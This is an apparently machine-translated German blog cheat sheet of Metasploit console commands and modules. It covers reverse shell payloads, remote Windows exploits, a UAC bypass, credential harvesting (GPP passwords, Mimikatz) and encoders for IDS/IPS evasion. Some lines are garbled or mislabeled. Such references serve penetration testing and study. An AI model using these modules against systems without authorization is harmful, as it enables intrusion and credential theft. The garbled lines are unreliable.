Möchten Sie Metasploit Pro Framework oder Metasploit Unleashed verwenden? Nun, Sie müssen zuerst ihre Befehle kennen!. Im Folgenden teilen wir Ihnen die neueste Metasploit-Befehlsliste von 2021 mit. Dieses Spickzettel enthält alle Befehle, die Sie jemals benötigen werden, um voranzukommen!
In diesem Handbuch werden wir sehr grundlegende Informationen zum Spickzettel für Metasploit-Befehle erläutern die in der Befehlszeilenschnittstelle verwendet werden kann. Es gibt auch viele andere Befehlszeilen-Konsolen, die über das Internet verfügbar sind (z. B. MSFConsole-Befehlszeile ), die jedoch sehr schwer zu verwenden und zu verstehen sind.
Metasploit ist ein Produkt, mit dem in ein Remote-System eingebrochen werden kann und mit dem auch die Sicherheitsanfälligkeit eines Computersystems getestet werden kann. Wie alle anderen Informationssicherheitstools kann Metasploit auch für beide Zwecke verwendet werden (nicht autorisierte und legitime Aktivitäten). Der Rapid7 hat außerdem die beiden proprietären Editionen oder Versionen Metasploit Pro und Metasploit Express hinzugefügt. Sie können auch einige unserer Kali Linux Terminal-Befehle zum Hacken sehen.
Metasploit zeigt das Risiko und die Behebung bestimmter Fehler auf, die möglicherweise auf Ihrem Personal Computer (PC) verfügbar sind. Später wurde das Fuzzing-Tool auch in Metasploit 3.0 aufgenommen, mit dem die Schwachstellen von Software auch bei Exploits für die bekannten Fehler entdeckt wurden. Nach einiger Zeit wurde im November 2006 auch das Toolset Lorcon Wireless (802.11) zum Metasploit 3.0 hinzugefügt. Nach all diesen Updates veröffentlichte das Rapid7 im August 2011 das Metasploit 4.0.
Sie können Holen Sie sich Metasploit Pro Framework von der folgenden Seite:
Laden Sie Metasploit Pro Framework kostenlos herunter
H. D. Moore war 2003 der Schöpfer dieses tragbaren Netzwerk-Tools namens Metasploit mit Perl. 2007 wurde das Metasploit Framework im Ruby komplett neu geschrieben. Am 21. Oktober 2009 gab der Metasploit bekannt, dass er von Rapid7 gekauft oder erworben wurde. Rapid7 ist ein Sicherheitsunternehmen, das viele Arten von einheitlichen Lösungen zum Verwalten von Sicherheitslücken anbietet.
Befehl | Beschreibung der CMD |
set payload windows/vncinject/reverse_tcpset ViewOnly false | Meterpreter Windows VNC Payload
|
Befehl | Beschreibung der CMD |
set payload linux/meterpreter/reverse_tcp | Meterpreter Linux Reverse Payload |
Meterpreter-Download-Datei vom Windows-Ziel
Read: Top 9 Hacking-Befehle für Microsoft CMD-Eingabeaufforderungen 2021.
Befehl | Beschreibung der CMD |
Exploit/windows/smb/ms08_067_netapi | MS08_067 Windows 2k, XP, 2003 Remote Exploit |
Verwenden Sie Exploit/Windows/Dcerpc/ms06_040_netapi | MS08_040 Windows NT, 2k, XP, 2003 Remote Exploit |
Exploit verwenden/windows/smb/ ms09_050_smb2_negotiate_func_index | MS09_050 Windows Vista SP1/SP2 und Server 2008 (x86) Remote Exploit |
Befehl | Beschreibung der CMD |
Verwenden Sie Exploit/Windows/Local/Bypassuac | UAC unter Windows 7 umgehen + Ziel + Bogen festlegen, x86/64 |
Befehl | Beschreibung der Verwendung von CMD |
Auxiliary/Scanner/http/dir_scanner | HTTP-Verzeichnisscanner von Metasploit |
Auxiliary/Scanner/http/jboss_vulnscan verwenden | Metasploit JBOSS-Schwachstellenscanner |
Verwenden Sie auxiliary/scanner/mssql/mssql_login | Metasploit MSSQL Credential Scanner |
Verwenden Sie Auxiliary/Scanner/MySQL/MySQL_Version | Metasploit MSSQL-Versionsscanner |
Verwenden Sie auxiliary/scanner/oracle/oracle_login | Metasploit Oracle Login Module |
Lesen Sie auch: Der perfekte Leitfaden für DDoS wie ein Pro-Hacker.
Metasploit Powershell-Module
Befehl | Beschreibung von CMD |
Verwenden Sie Exploit/Multi/Script/Web_Delivery | Metasploit-Powershell-Nutzlast-Bereitstellungsmodul |
post/windows/verwalten/Powershell/Exec_Powershell | Metasploit hochladen und Powershell-Skript über eine Sitzung ausführen |
Exploit/multi/http/jboss_maindeployer verwenden | Metasploit JBOSS deploy |
Exploit/windows/mssql/mssql_payload verwenden | Metasploit MSSQL-Payload |
Befehl | Beschreibung der CMD |
post/windows/collect/win_privs ausführen | Metasploit zeigt die Berechtigungen des aktuellen Benutzers |
Verwenden Sie post/windows/collect/credentials/gpp | Metasploit Grab GPP gespeicherte Passwörter |
oad mimikatz-\u0026 gt; wdigest | Metasplit-Last Mimikatz |
run post/windows/collect/local_admin_search_enum | Identifiziert andere Computer, auf die der angegebene Domänenbenutzer Administratorzugriff hat |
Quelle: TheHackToday
Der Metasploit-Befehl zum Aktualisieren von Framework:
passendes Update; apt install metasploit-framework |
Der folgende Befehl enthält die neueste Version von Metasploit-Framework, das aktualisiert wird. Das Update besagt Folgendes, dass wir das wöchentliche Update der Kopie unseres Metasploit Framework aktualisieren sollten. Es gibt jedoch einen kleinen Nachteil dieses Befehls, und das Ausführen dieses Befehls kann die Kopie Ihrer auf Ihrem PC installierten Software beschädigen oder beschädigen.
Empfohlene Lektüre : Oben 8 Die besten Linux-Distributionen für Hacking-und Penetrationstests!
Metasploit-Befehle msfhelp/console:
Wenn Sie Metasploit zum ersten Mal ausführen, wird das folgende Fenster angezeigt wird auf Ihrem Bildschirm geöffnet. Wenn Sie nichts über Metasploit wissen oder keine Informationen dazu haben, können Sie einfach Folgendes eingeben: help, um alle Befehle und Informationen zu Metasploit anzuzeigen.
Ich werde Ihre Zeit nicht verschwenden Bei der Erläuterung aller Befehle in Metasploit werde ich jedoch einige der grundlegenden und am häufigsten verwendeten Befehle erläutern, die Sie am häufigsten verwenden werden.
Dieser Befehl wird verwendet, um nach verschiedenen Arten oder Arten von Schwachstellen und Exploits aus dem zu suchen msfconsole.
Mit diesem Befehl behalten Sie die Dokumentation im Auge und sehen sich den Eigentümer des Exploits an.
Lesen Sie: 8 beste Möglichkeiten zum Sichern Ihres Linux-Servers (Linux Hardening Guide 2021).
Mit Hilfe dieses einfachen Befehls können wir show-Befehle verwenden, um alle für die Nutzlast erforderlichen Werte anzuzeigen, mit denen der PC oder die Maschine des Opfers, die wir angreifen möchten, weiter angegriffen werden kann.
Mit Hilfe dieses Befehls können Sie dies problemlos tun Wenn Sie das WAN-Netzwerk angreifen, müssen Sie nur den LHOST auf die statische IP-Adresse IP und alle anderen Forward-Ports einstellen.
Wenn Sie versuchen, im LAN-Netzwerk zu arbeiten, müssen Sie den Port nicht weiterleiten, sondern können jeden beliebigen Port verwenden, den Sie verwenden möchten. Wenn Sie jedoch das WAN-Netzwerk angreifen, müssen Sie den Port, den Sie angreifen möchten, weiterleiten.
Mit Hilfe dieses Befehls verwenden wir den Befehl show payloads. Dieser Befehl gibt eine ganze Liste kompatibler Nutzdaten für den folgenden Exploit zurück. In der folgenden Abbildung hat Metasploit viele kompatible Nutzdaten geladen:
Dieser Befehl gibt eine ganze Liste zurück von Betriebssystemen, die für den ausgewählten oder ausgewählten Exploit sehr anfällig sind. Nach dem Ausführen dieses Befehls erhalten wir die folgende Ausgabe des folgenden Exploits:
Adobe_flash_shader_drawing_fill-Exploit.
Mit diesem Befehl show advanced können wir alle erweiterten Optionen für die erforderlichen Exploits anzeigen.
Download: Nessus Professional Vulnerability Scanner-Software.
Mit diesem Befehl werden alle zurückgegeben kompatible Encoder. Diese Encoder werden verwendet, um die einfachen IDS/IPS-Signaturen zu umgehen, die nach bestimmten Bytes der verfügbaren Nutzlast durchsucht wurden.
Dieser Befehl gibt eine ganze Liste der NOP-Generatoren zurück. NOP ist die Abkürzung für No Operation und wird verwendet, um das Muster zu ändern, um einfache IDS/IPS gängiger NOP-Schlitten zu umgehen. Diese NOP-Generatoren beginnen mit einer vollständigen Konfiguration der CPU-Architektur im Namen.
Download: Acunetix Web Vulnerability Scanner Kostenlos.
Sie können den offiziellen Offensive Security Site für die vollständigen AZ Metasploit-Befehle.
In diesem Artikel haben wir die Liste der Metasploit-Befehle im Jahr 2021 besprochen. Wir haben auch über viele verschiedene Befehle gesprochen, mit denen Sie verschiedene Aufgaben und all die verschiedenen Funktionen ausführen können. Es ist eine absolut sichere Methode, um die anfällige Überprüfung zu verwenden und durchzuführen und all diese damit verbundenen Probleme zu lösen.
Ich hoffe, dieser Leitfaden wird Ihnen wirklich hilfreich sein. Teilen Sie es mit Ihren Freunden und Ihrer Familie, um ihnen bei der Lösung ihrer Probleme zu helfen. Wenn Sie Fragen haben, lassen Sie diese im Kommentarbereich. Wir sind immer für Sie da, wenn Sie Hilfe benötigen.
Die Microsoft Sticky Notes sind ein beliebtes und nützliches Tool für Benutzer von Windows 10-Systemen,…
Microsoft hat kürzlich den lang erwarteten Windows 11 Dev Channel veröffentlicht, auf den über Windows…
Windows 10 ist eines der beliebtesten und am weitesten verbreiteten Betriebssysteme für Computerbenutzer.Die Entwicklung von…
Überprüfen und konfigurieren Sie die BerechtigungseinstellungenAktivieren Sie Edge für die Ausführung mit AdministratorrechtenReparieren Sie Microsoft…
Die meisten der neuesten Laptops haben keinen eingebauten Ethernet-Anschluss.Wir alle wissen, dass kabelgebundene Verbindungen viel…
Die Grafikverarbeitungseinheit oder GPU ist eine wesentliche Komponente eines Computersystems, die für die Wiedergabe von…